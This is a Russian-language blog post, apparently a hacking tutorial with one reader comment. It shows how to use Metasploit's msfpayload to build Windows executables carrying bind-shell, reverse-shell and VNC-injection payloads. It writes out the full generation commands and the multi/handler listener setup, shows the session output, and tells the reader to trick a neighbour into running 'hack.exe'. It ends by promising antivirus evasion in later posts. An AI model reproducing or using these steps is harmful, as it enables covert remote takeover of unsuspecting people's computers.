В новой версии MSF произошли некоторые перестановки. Раньше для создания файлов использовался CMD Shell, а теперь это Shell.
Найти его можно в :
C:\Program Files\Metasploit\Framework3\Shell
Нус, приступим :
Для начала, выбираем начинку. Командуем show payloads :
Покажу несколько примеров, а дальше полет фантазии.
1. shell_bind_tcp (ждет подключение на 4444 порт и дает шелл)
Открываем Shell и пишем :
msfpayload windows/shell_bind_tcp LPORT=4444 X >hack.exe
Жмем ENTER и получаем
Все созданные файлы будут сохранены в
C:\Program Files\Metasploit\Framework3\Home\Username
Теперь впариваем наш hack.exe cоседу. Он его открывает, а мы через NetCat :
nc IP victim :4444
2. windows/shell/reverse_tcp (соединяет с нашим компом и дает шелл)
Таким же макаром :
msfpayload windows/shell/reverse_tcp LHOST=наш IP X >hack.exe
У себя на тачке в консоли:
use multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST наш IP
set LPORT 4444
exploit
[*] Started reverse handler
[*] Starting the payload handler...
Консоль не закрываем и просто ждем. Как только юзверь откроет наш файл, то в консоли появится открытая сессия.
[*] Started reverse handlerИ еще :
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Session 1 opened (наш IP:4444 -> 192.168.1.2:1060)
windows/vncinject/reverse_tcp
Это чтобы шариться на тачке как на своей, а не через командную строку.
msfpayload windows/vncinject/reverse_tcp LHOST=наш IP LPORT=4444 X > hack.exe
У себя :
use multi/handler
set PAYLOAD windows/vncinject/reverse_tcp
set LHOST наш IP
set LPORT 4444
exploit
Надеюсь схема понятна, повторюсь, что экзешник можно сделать из любой начинки.
На этом все, удачи в делах наших ...
PC К сожалению, созданные таким способом файлы, в основной своей массе палятся антивирусами, как это обойти будет темой следующих статей.
$vz00r
это та консоль, под названием Metasm Shell?
RépondreSupprimer